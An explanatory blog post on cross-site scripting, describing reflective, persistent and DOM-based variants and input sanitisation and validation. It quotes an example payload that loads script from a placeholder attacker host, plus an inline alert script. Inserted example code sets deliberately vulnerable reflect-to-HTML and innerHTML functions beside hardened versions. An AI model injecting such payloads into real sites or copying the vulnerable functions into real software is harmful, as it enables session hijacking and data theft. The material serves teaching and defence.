What Is Cross-Site Scripting (XSS)?

Cross-Site Scripting (XSS) attacks are consistently featured in the OWASP Top 10 list. In this post, we talk about what it is, what can happen to your data, and what you should do about it.

What Is A Cross-Site Scripting (XSS) Attack?

Cross-Site Scripting (XSS) is a type of client-side injection attack where a malicious script is injected and allowed to run in a legitimate website. An attack starts when the user visits the website with the malicious code.

Categories of websites vulnerable to XSS attacks include message boards and any website that allows user comments. XSS scripts are typically written in JavaScript, VBScript, Flash, or even CSS.

XSS Attack Examples

The <script> tag attack is the most straightforward example of an XSS payload. A script tag can reference external JavaScript code, or you can embed the code within the script tag itself. For instance:

<!-- External script -->

<script src=http://hacker.com/hacked.js></script>

<!-- Embedded script -->

<script> alert("HACKED!!!");</script>

A common use case for an XSS attack is for the attacker to be able to control their victim’s web browser or account. As this attack is executed within a browser session, this allows them to bypass typical security defenses.

XSS attacks are perceived to be a little less dangerous than SQL injection attacks, but once an XSS attack is successfully executed, the attacker can do any of the following things:

  • Send arbitrary HTTP requests to various locations of the attacker’s choosing.
  • Use HTML5 APIs to access things like geo-location, microphone, and webcam.
  • Access a user’s session and cookies. The attacker can then impersonate the user and gain access to the same data the user does.
  • Deface websites and perform Denial of Service (DoS) attacks.

An XSS attack is especially powerful when combined with social engineering attacks. With more access, the attacker can then perform advanced attacks like malware injection, phishing, and identity theft.

Types of XSS Attacks

Reflective XSS

A reflective XSS attack, also known as a non-persistent XSS attack, is an attack where the malicious script runs from another website through the web browser. Because the script is passed through a query, typically in the URL, starting the attack is as simple as leveraging social engineering trickery to bamboozle the user into clicking a link.

Reflective XSS attacks are the most common XSS type, but also the easiest type to avoid, since user interaction is needed for the attack to commence. For this reason, attackers send malicious content to as many users as possible for more chances of a successful attack.

Persistent XSS

Meanwhile, a persistent XSS, also known as a stored XSS attack, is the more dangerous XSS attack type. This type of attack happens when the web application stores user input for later use and then serves it to other users.

Persistent XSS is more dangerous because unlike Reflective XSS attacks, which require the user to interact with the XSS trigger, a persistent XSS only requires a visit to the malicious webpage.

DOM-Based XSS

Document Object Model (DOM)-based XSS attacks are a type of XSS that has payloads found in the DOM rather than within the HTML code.

The DOM is an interface for HTML and XML files that represents data that comprise HTML or XML documents, which can then be modified and manipulated using a scripting language such as JavaScript.

Unlike Reflective and Persistent XSS, which are exploited through vulnerabilities in server-side scripts, DOM-based XSS attacks are exploited through vulnerabilities in the client-side code.
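The client-side source-to-sink flow described above, as an added example that is not part of the original post. The function names and URL are assumptions, and makeElement is a constructed stand-in for a DOM element so the snippet also runs outside a browser.

```javascript
// Added example; makeElement() is a constructed stand-in for a DOM element
// so the snippet also runs outside a browser (for instance under Node.js).
function makeElement() {
  let markup = '';
  return {
    get innerHTML() { return markup; },
    // A browser parses whatever is assigned here as HTML.
    set innerHTML(html) { markup = String(html); },
    // A browser stores this as a text node, which serialises with
    // &, < and > encoded.
    set textContent(text) {
      markup = String(text)
        .replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
    },
  };
}

// Source: the URL fragment. It is never sent to the server, so server-side
// filtering cannot see it; the flaw and the fix both live in client code.
function nameFromFragment(href) {
  return decodeURIComponent(new URL(href).hash.slice(1));
}

// Vulnerable: attacker-controlled text flows into an HTML-parsing sink.
function greetVulnerable(el, href) {
  el.innerHTML = 'Hello, ' + nameFromFragment(href);
}

// Hardened: same source, but the sink treats the value as text only.
function greetHardened(el, href) {
  el.textContent = 'Hello, ' + nameFromFragment(href);
}

// Constructed sample URL carrying the payload shown earlier on this page.
const FRAGMENT_URL = 'https://app.example/welcome#' +
  encodeURIComponent('<script> alert("HACKED!!!");</script>');

const unsafeEl = makeElement();
greetVulnerable(unsafeEl, FRAGMENT_URL);
const safeEl = makeElement();
greetHardened(safeEl, FRAGMENT_URL);
console.log(unsafeEl.innerHTML);
console.log(safeEl.innerHTML);
```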

XSS Protection

Web applications are vulnerable to XSS when they do not sanitize and validate user input. Sanitizing user input means scrubbing the input clean of anything that can potentially exploit vulnerabilities. Common ways of sanitizing input include removing characters like "<" and ">" and other similar characters.

Input validation is another important step in avoiding XSS attacks. This prevents users from entering certain characters by denying a request whenever risky inputs are detected.
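The reflective and persistent cases from earlier, with the protections from this section applied, as an added example that is not part of the original post. It encodes the risky characters on output rather than removing them, and the function names, URL and allowlist pattern are assumptions.

```javascript
// Added example, not code from the original post; all names are hypothetical.

// Output encoding: neutralise the characters that let text break out of
// HTML element content or a quoted attribute value.
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Input validation: allowlist what a search term may contain and deny the
// request otherwise, rather than trying to clean the value up.
const SEARCH_TERM = /^[\p{L}\p{N} ._-]{1,64}$/u;
function validateSearchTerm(term) {
  return typeof term === 'string' && SEARCH_TERM.test(term);
}

// Vulnerable: the query parameter is reflected into the page unchanged.
function renderResultsVulnerable(url) {
  const q = new URL(url).searchParams.get('q') ?? '';
  return { status: 200, body: `<p>Results for ${q}</p>` };
}

// Hardened: validate on input, and still encode on output.
function renderResultsHardened(url) {
  const q = new URL(url).searchParams.get('q') ?? '';
  if (!validateSearchTerm(q)) {
    return { status: 400, body: '<p>Invalid search term</p>' };
  }
  return { status: 200, body: `<p>Results for ${escapeHtml(q)}</p>` };
}

// Stored case: comments are free text, so an allowlist is not practical;
// encoding at render time is what keeps them inert for other visitors.
function renderComment(author, text) {
  return `<li><b>${escapeHtml(author)}</b>: ${escapeHtml(text)}</li>`;
}

// Constructed sample input, reusing the payload shown earlier on this page.
const PAYLOAD = '<script> alert("HACKED!!!");</script>';
const SAMPLE_URL = 'https://shop.example/search?q=' + encodeURIComponent(PAYLOAD);

console.log(renderResultsVulnerable(SAMPLE_URL).body);
console.log(renderResultsHardened(SAMPLE_URL).status);
console.log(renderComment('mallory', PAYLOAD));
```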

On the user side, education and vigilance are still the most effective ways of preventing XSS attacks. Since the most effective XSS attacks are combined with social engineering techniques, educated users can neutralize even the most sophisticated of XSS attacks.

Closing Thoughts

The cost of one XSS attack exceeds the investments you make to protect your assets. Before you take the first steps to protect your employees and digital assets, learn about the common cyber threats today and the top cyber risks that your organization faces. Once you’ve done that, you can then build a unique strategy that suits your organization's needs.

Samantha Cruz

Samantha Cruz is a Cyber Security Engineer specializing in cloud security and compliance. Prior to joining Horangi, she worked for Trend Micro and Pandora Security Labs.